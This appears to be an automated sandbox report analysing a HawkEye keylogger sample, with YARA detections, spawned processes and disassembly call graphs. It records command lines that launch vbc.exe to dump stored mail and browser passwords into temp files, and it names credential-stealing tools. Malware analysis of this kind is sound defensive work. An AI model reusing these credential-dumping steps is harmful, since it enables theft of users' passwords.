                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: JPCERT/CC Incident Response Group
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low

                                                                                Chronological Activities

                                                                                Analysis Process: dw20.exe PID: 2932 Parent PID: 2360

                                                                                General

                                                                                Start time:14:15:38
                                                                                Start date:17/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:dw20.exe -x -s 1708
                                                                                Imagebase:0x10000000
                                                                                File size:33936 bytes
                                                                                MD5 hash:FBA78261A16C65FA44145613E3669E6E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Chronological Activities

                                                                                Analysis Process: vbc.exe PID: 2852 Parent PID: 2360

                                                                                General

                                                                                Start time:14:15:41
                                                                                Start date:17/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                Imagebase:0x400000
                                                                                File size:1170056 bytes
                                                                                MD5 hash:1672D0478049ABDAF0197BE64A7F867F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Chronological Activities

                                                                                Analysis Process: vbc.exe PID: 2816 Parent PID: 2360

                                                                                General

                                                                                Start time:14:15:42
                                                                                Start date:17/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                Imagebase:0x400000
                                                                                File size:1170056 bytes
                                                                                MD5 hash:1672D0478049ABDAF0197BE64A7F867F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Chronological Activities

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >

                                                                                  Analysis Process: Sample_B.exe PID: 2368 Parent PID: 2956 Sample_B.exeCOMMON

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:5.1%
                                                                                  Total number of Nodes:118
                                                                                  Total number of Limit Nodes:10

                                                                                  Graph

                                                                                  execution_graph 39215 5d2dde 39218 5d2e04 ShellExecuteExW 39215->39218 39217 5d2e20 39218->39217 39219 5d105e 39221 5d1096 accept 39219->39221 39222 5d10d1 39221->39222 39277 5d0e9e 39278 5d0ed3 getsockname 39277->39278 39280 5d0f07 39278->39280 39223 27a8ae 39224 27a910 39223->39224 39225 27a8da closesocket 39223->39225 39224->39225 39226 27a8e8 39225->39226 39289 5d3096 39290 5d30f6 39289->39290 39291 5d30c2 DestroyWindow 39289->39291 39290->39291 39292 5d30d7 39291->39292 39227 27bc2a 39229 27bc62 CreateFileW 39227->39229 39230 27bcb1 39229->39230 39293 5d190e 39295 5d1934 AddAtomW 39293->39295 39296 5d1950 39295->39296 39297 27a172 39298 27a19d WSAStartup 39297->39298 39299 27a1c4 39298->39299 39300 5d278a 39301 5d27bf PostMessageW 39300->39301 39302 5d27ea 39300->39302 39303 5d27d4 39301->39303 39302->39301 39234 5d2bc6 39235 5d2bf5 ShowWindow 39234->39235 39236 5d2c29 39234->39236 39237 5d2c0a 39235->39237 39236->39235 39308 27a2fa 39309 27a326 UnmapViewOfFile 39308->39309 39311 27a365 39308->39311 39310 27a334 39309->39310 39311->39309 39312 5d0f82 39314 5d0fb7 ioctlsocket 39312->39314 39315 5d0fe3 39314->39315 39238 27b002 39239 27b037 GetTokenInformation 39238->39239 39241 27b074 39239->39241 39316 27bd42 39318 27bd77 GetFileType 39316->39318 39319 27bda4 39318->39319 39320 5d0dba 39321 5d0def bind 39320->39321 39323 5d0e23 39321->39323 39324 5d19ba 39325 5d19e6 LoadLibraryShim 39324->39325 39327 5d1a14 39325->39327 39328 5d133a 39329 5d138a CreateFileMappingW 39328->39329 39330 5d1392 39329->39330 39331 27b84e 39334 27b886 WSASocketW 39331->39334 39333 27b8c2 39334->39333 39242 5d00f2 39243 5d0142 SetConsoleCtrlHandler 39242->39243 39244 5d0150 39243->39244 39245 5d0b72 39247 5d0ba7 GetProcessTimes 39245->39247 39248 5d0bd9 39247->39248 39335 27a5d6 39336 27a614 DuplicateHandle 39335->39336 39337 27a64c 39335->39337 39338 27a622 39336->39338 39337->39336 39339 27ab56 39340 27ab8e RegOpenKeyExW 39339->39340 39342 27abe4 39340->39342 39249 5d2c6e 39251 5d2c97 CopyFileW 39249->39251 39252 5d2cbe 39251->39252 39343 27bed2 39345 27bf07 setsockopt 39343->39345 39346 27bf39 39345->39346 39347 27b952 39348 27b9c2 39347->39348 39349 27b98a setsockopt 39347->39349 39348->39349 39350 27b998 39349->39350 39253 5d26ea 39254 5d2719 GetWindowPlacement 39253->39254 39255 5d2744 39253->39255 39256 5d272e 39254->39256 39255->39254 39351 5d09aa 39353 5d09df listen 39351->39353 39354 5d0a08 39353->39354 39257 27b31e 39259 27b356 LsaOpenPolicy 39257->39259 39260 27b397 39259->39260 39355 27ac5e 39356 27ac93 RegQueryValueExW 39355->39356 39358 27ace7 39356->39358 39261 5d20e6 39262 5d210c GetTextExtentPoint32W 39261->39262 39264 5d2139 39262->39264 39359 5d0526 39361 5d055e MapViewOfFile 39359->39361 39362 5d05ad 39361->39362 39363 5d0426 39365 5d045e OpenFileMappingW 39363->39365 39366 5d0499 39365->39366 39265 27a69a 39266 27a6c6 SetErrorMode 39265->39266 39267 27a6ef 39265->39267 39268 27a6db 39266->39268 39267->39266 39269 5d13e2 39270 5d141a MapViewOfFile 39269->39270 39271 5d1452 39269->39271 39272 5d1428 39270->39272 39271->39270 39273 5d1162 39274 5d1197 WSAEventSelect 39273->39274 39276 5d11ce 39274->39276 39367 5d08a2 39368 5d08da CreateMutexW 39367->39368 39370 5d091d 39368->39370

                                                                                  Executed Functions

                                                                                  Function 00551DB8, Relevance: 11.6, Strings: 8, Instructions: 1631COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @q($Dp($Lq($Pp($Xq($\p($hp($tp(
                                                                                  • API String ID: 0-287671918
                                                                                  • Opcode ID: 5f16042c5f17d6d168c1b1ce951458ccbaabdac114defb2a7a3be260c49d4e9e
                                                                                  • Instruction ID: a5a149db858e85ddfb5310a4d6e4607c084da4532bd2d2dfc8e5e41e11ccbf80
                                                                                  • Opcode Fuzzy Hash: 5f16042c5f17d6d168c1b1ce951458ccbaabdac114defb2a7a3be260c49d4e9e
                                                                                  • Instruction Fuzzy Hash: 2803CE74A012298FDB65DF68C894BADBBB6BB49304F1085EAD40DA7394DB309E85CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0D87, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 670 5d0d87-5d0df7 674 5d0dfc-5d0e13 670->674 675 5d0df9 670->675 677 5d0e15-5d0e35 bind 674->677 678 5d0e57-5d0e5c 674->678 675->674 681 5d0e5e-5d0e63 677->681 682 5d0e37-5d0e54 677->682 678->677 681->682
                                                                                  APIs
                                                                                  • bind.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0E1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: bind
                                                                                  • String ID:
                                                                                  • API String ID: 1187836755-0
                                                                                  • Opcode ID: eb7bb18835e633ec2c0f1ecd4a6343752ab3d9bac864572935f1b50d9be6ea5f
                                                                                  • Instruction ID: a891d03cd9240b91e036c8fbc7cc591de5f8c102526f9f8c521968d13487632d
                                                                                  • Opcode Fuzzy Hash: eb7bb18835e633ec2c0f1ecd4a6343752ab3d9bac864572935f1b50d9be6ea5f
                                                                                  • Instruction Fuzzy Hash: FD219171509380AFE722CB65DC44F96BFB8EF06320F08849BE944CB292D275A909CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D096C, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • listen.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0A00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: listen
                                                                                  • String ID:
                                                                                  • API String ID: 3257165821-0
                                                                                  • Opcode ID: 1c1aadcd31f46bef516bfb3ec98961f05032928f4209eba3c2482413f4fdef5f
                                                                                  • Instruction ID: d8747f0229ac15da1b950a4e72954ba169c548b09ffbafefe162f84ada3c91c6
                                                                                  • Opcode Fuzzy Hash: 1c1aadcd31f46bef516bfb3ec98961f05032928f4209eba3c2482413f4fdef5f
                                                                                  • Instruction Fuzzy Hash: E721C4B2404384AFEB22CB54DC85F96BFA8EF42320F0985DBE9489F193D274A905C761
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0DBA, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • bind.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0E1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: bind
                                                                                  • String ID:
                                                                                  • API String ID: 1187836755-0
                                                                                  • Opcode ID: c3de1c1e8a6cdbee51f8f7f34cd9cef10fbb06fafe25a26304eb18e3a0c60c4e
                                                                                  • Instruction ID: 5812cb5ec2af910b10a6e205a53585b55e443ec0f6d0a4f0e02376b7a6511dc5
                                                                                  • Opcode Fuzzy Hash: c3de1c1e8a6cdbee51f8f7f34cd9cef10fbb06fafe25a26304eb18e3a0c60c4e
                                                                                  • Instruction Fuzzy Hash: 76118F72500344EFEB20DF55DC85FA6FBECEF04720F14896BEA499B281D674A944CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D09AA, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • listen.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0A00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: listen
                                                                                  • String ID:
                                                                                  • API String ID: 3257165821-0
                                                                                  • Opcode ID: 5e78c8f88d46af485d45fe7feb9d5b5585879ed80a81134726170cd0f4f96b25
                                                                                  • Instruction ID: c2515154d965988fcd180cfaeea9a99106e5494f0a9c3e115d48e04b05f05cd5
                                                                                  • Opcode Fuzzy Hash: 5e78c8f88d46af485d45fe7feb9d5b5585879ed80a81134726170cd0f4f96b25
                                                                                  • Instruction Fuzzy Hash: 0011E171500304EFFB21DF15DC85BA6FBA8EF44720F1484ABED099B281D674A9048BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00550D30, Relevance: 5.3, Strings: 4, Instructions: 298COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 382 550d30-550d40 383 550d47-5511fd call 551530 382->383 384 550d42 382->384 447 551204-551221 383->447 448 5511ff 383->448 384->383 450 551223 447->450 451 551228-55123b 447->451 448->447 450->451 455 55123d call a807f8 451->455 456 55123d call 551c60 451->456 457 55123d call a8081e 451->457 458 55123d call 551c5f 451->458 453 551242-551248 455->453 456->453 457->453 458->453
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: _qq$ p($dq($p(
                                                                                  • API String ID: 0-926209368
                                                                                  • Opcode ID: 6067826ae932f8e58aab904514a658fb818f0e1043bc89f6471283d77513cd28
                                                                                  • Instruction ID: 393793de78f5aa94071b91ff73015fd6a078b83b0cef8c707ba9318c076832bb
                                                                                  • Opcode Fuzzy Hash: 6067826ae932f8e58aab904514a658fb818f0e1043bc89f6471283d77513cd28
                                                                                  • Instruction Fuzzy Hash: A9E1AA34A0130ADFDB04EFA4D494EDDBBB2FF85348F5485A8D4056B369DB316A4ADB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00550898, Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 459 550898-5508c9 460 5508d0-5508fe 459->460 461 5508cb 459->461 462 550900-550911 460->462 463 55091b 460->463 461->460 462->463 468 550913-550919 462->468 464 550922-55092e 463->464 466 550934-55094e 464->466 467 550cb2-550cc6 464->467 471 550954-550978 466->471 472 550a1f-550a42 466->472 468->464 475 55097f-550982 471->475 476 55097a-55097d 471->476 482 550a49-550a6b 472->482 477 550985-5509af 475->477 476->477 483 5509b1-550a10 477->483 484 550a1b-550a1d 477->484 486 550a72-550a75 482->486 487 550a6d-550a70 482->487 483->484 484->482 489 550a78-550aa7 486->489 487->489 495 550abf 489->495 496 550aa9-550abd 489->496 497 550ac2 495->497 496->497 500 550ac9-550c7c 497->500 503 550c83-550c86 500->503 504 550c7e-550c81 500->504 505 550c89-550ca6 503->505 504->505 505->467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: :@lq$\,(
                                                                                  • API String ID: 0-3369258770
                                                                                  • Opcode ID: 2d53211c0ae839db27effe3de078d04188fb99aa16132296e6cdaa406f18b2e9
                                                                                  • Instruction ID: 7456fba5da992c09a197321666154d60330704c43f305e887117bbea3d0ec040
                                                                                  • Opcode Fuzzy Hash: 2d53211c0ae839db27effe3de078d04188fb99aa16132296e6cdaa406f18b2e9
                                                                                  • Instruction Fuzzy Hash: 0791D374E01218CFDB14DFA9C894BADBBB2BF89315F10916AD809AB390DB705D45CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00550158, Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 508 550158-550165 509 550167 508->509 510 55016c-550179 508->510 509->510 526 55017c call a807f8 510->526 527 55017c call a8081e 510->527 512 550182-550225 526->512 527->512
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4b($c(
                                                                                  • API String ID: 0-1040441714
                                                                                  • Opcode ID: 070b441b5526b543cb35c5b8fd520efb267ccc9781c9ed05e14f6b6a5df8f15a
                                                                                  • Instruction ID: d8637903f5520db698dcc36a6690e393bb8d47618d104cb4e24a4ca71a5050de
                                                                                  • Opcode Fuzzy Hash: 070b441b5526b543cb35c5b8fd520efb267ccc9781c9ed05e14f6b6a5df8f15a
                                                                                  • Instruction Fuzzy Hash: 68116334A1221ADFCB04FFB4E84899DB771FF40305B408069D4095B365DB705E19EFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027B729, Relevance: 1.6, APIs: 1, Instructions: 112registryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 528 27b729-27b733 529 27b735-27b74c 528->529 530 27b74d-27b75b 528->530 529->530 532 27b77d-27b7af 530->532 533 27b75d-27b77c 530->533 536 27b7b2-27b80a RegQueryValueExW 532->536 533->532 538 27b810-27b826 536->538
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 0027B802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 872ad79ab12af1a75f09ddeb8f20e7c7ae52bc1b9dd85d50d58cfedc4b2771b5
                                                                                  • Instruction ID: e821e0ba629247dd40a872a956282664d07bcf0f18ba77bbac1e78feca3d9c05
                                                                                  • Opcode Fuzzy Hash: 872ad79ab12af1a75f09ddeb8f20e7c7ae52bc1b9dd85d50d58cfedc4b2771b5
                                                                                  • Instruction Fuzzy Hash: 3B413D2540E3C0AFD3138B258C65B61BF74EF47620F0E85DBD8848F5A3D2296919D7B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027BBF3, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 539 27bbf3-27bc82 543 27bc87-27bc93 539->543 544 27bc84 539->544 545 27bc95 543->545 546 27bc98-27bca1 543->546 544->543 545->546 547 27bca3-27bcc7 CreateFileW 546->547 548 27bcf2-27bcf7 546->548 551 27bcf9-27bcfe 547->551 552 27bcc9-27bcef 547->552 548->547 551->552
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0027BCA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: a10a3d06bc9248fec419bc3032b34c2e70d4289a81a376365ac52ba1cc0503a3
                                                                                  • Instruction ID: 47fe59f1383fd88f5b625002b0941fa08869de0652d6a27903bf5e11b1ae85b0
                                                                                  • Opcode Fuzzy Hash: a10a3d06bc9248fec419bc3032b34c2e70d4289a81a376365ac52ba1cc0503a3
                                                                                  • Instruction Fuzzy Hash: ED31A4B1504340AFE722CF25CC45F62BFE8EF06314F08849EE9888B252D775A909DB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027AB26, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 555 27ab26-27abb1 559 27abb6-27abcd 555->559 560 27abb3 555->560 562 27ac0f-27ac14 559->562 563 27abcf-27abe2 RegOpenKeyExW 559->563 560->559 562->563 564 27ac16-27ac1b 563->564 565 27abe4-27ac0c 563->565 564->565
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0027ABD5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 77bc999149a00bb97b8ee3befc3ed1c605b80f7ec706836ae3731ab59c5ce536
                                                                                  • Instruction ID: f1758696363614a457e6746637d422f245569beef98da0a88b1aa9cac295c489
                                                                                  • Opcode Fuzzy Hash: 77bc999149a00bb97b8ee3befc3ed1c605b80f7ec706836ae3731ab59c5ce536
                                                                                  • Instruction Fuzzy Hash: 3531B472544384AFE722CF11CC45FA7BFACEF45320F08859BF9858B152D265A909C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D1025, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 570 5d1025-5d10b0 574 5d10b5-5d10c1 570->574 575 5d10b2 570->575 576 5d10c3-5d10cb accept 574->576 577 5d1112-5d1117 574->577 575->574 579 5d10d1-5d10e7 576->579 577->576 580 5d1119-5d111e 579->580 581 5d10e9-5d110f 579->581 580->581
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: accept
                                                                                  • String ID:
                                                                                  • API String ID: 3005279540-0
                                                                                  • Opcode ID: 6aa6c145a8b21cbd7b3be843c5ba354c64305d2495ed6ac6c83d479a90836df4
                                                                                  • Instruction ID: dba7e82a1ad2d7df470759cd88ca9f7410546f9ccf42e6e86dd1a65dcde3a6f6
                                                                                  • Opcode Fuzzy Hash: 6aa6c145a8b21cbd7b3be843c5ba354c64305d2495ed6ac6c83d479a90836df4
                                                                                  • Instruction Fuzzy Hash: 5631A671509780AFE722CB64DC45B96FFA8EF06314F0884DBE9848B253D375A908CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0B34, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 601 5d0b34-5d0bc9 606 5d0bcb-5d0bd3 GetProcessTimes 601->606 607 5d0c16-5d0c1b 601->607 609 5d0bd9-5d0beb 606->609 607->606 610 5d0c1d-5d0c22 609->610 611 5d0bed-5d0c13 609->611 610->611
                                                                                  APIs
                                                                                  • GetProcessTimes.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0BD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessTimes
                                                                                  • String ID:
                                                                                  • API String ID: 1995159646-0
                                                                                  • Opcode ID: c3be1506efccbecd4a81e4c53e3085c76c791a1561855cfe91364e94a69cb74c
                                                                                  • Instruction ID: 11cd229b491d86d31975a1813c6d3257d3b42291b4c18281227dad02b8792cd5
                                                                                  • Opcode Fuzzy Hash: c3be1506efccbecd4a81e4c53e3085c76c791a1561855cfe91364e94a69cb74c
                                                                                  • Instruction Fuzzy Hash: 4831C5B2505380AFE722CF24DC45B96BFB8EF16310F0885DBE985DB193D2259945C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027AC1D, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 584 27ac1d-27ac9b 587 27aca0-27aca9 584->587 588 27ac9d 584->588 589 27acae-27acb4 587->589 590 27acab 587->590 588->587 591 27acb6 589->591 592 27acb9-27acd0 589->592 590->589 591->592 594 27ad07-27ad0c 592->594 595 27acd2-27ace5 RegQueryValueExW 592->595 594->595 596 27ace7-27ad04 595->596 597 27ad0e-27ad13 595->597 597->596
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027ACD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 195b67ba030bfa40c928cdf9fc3093d3be96af3079845be7802c0cc85ac72d4e
                                                                                  • Instruction ID: 6f2dba634ba63547beaae6df6db24e617cb421383f99e3042c0648863ccd2188
                                                                                  • Opcode Fuzzy Hash: 195b67ba030bfa40c928cdf9fc3093d3be96af3079845be7802c0cc85ac72d4e
                                                                                  • Instruction Fuzzy Hash: 42319375505384AFE722CF21CC45FA6BFA8EF46320F08849AE949CB152D264E949CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027AFCF, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 614 27afcf-27b064 619 27b066-27b06e GetTokenInformation 614->619 620 27b0b1-27b0b6 614->620 621 27b074-27b086 619->621 620->619 623 27b0b8-27b0bd 621->623 624 27b088-27b0ae 621->624 623->624
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027B06C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  • Opcode ID: 8e7e63567eb45252d05f813550010fefb1adc1f5d3ee7284e0a10c0d24450ee4
                                                                                  • Instruction ID: 27719ae226bd5ccc7b7302e934594488eec30fe288dedab6aa325b61c296bd1d
                                                                                  • Opcode Fuzzy Hash: 8e7e63567eb45252d05f813550010fefb1adc1f5d3ee7284e0a10c0d24450ee4
                                                                                  • Instruction Fuzzy Hash: 7C318471509380AFE722CB21DC45F97BFA8EF06210F0985ABE945CB152D225A908C772
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0875, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
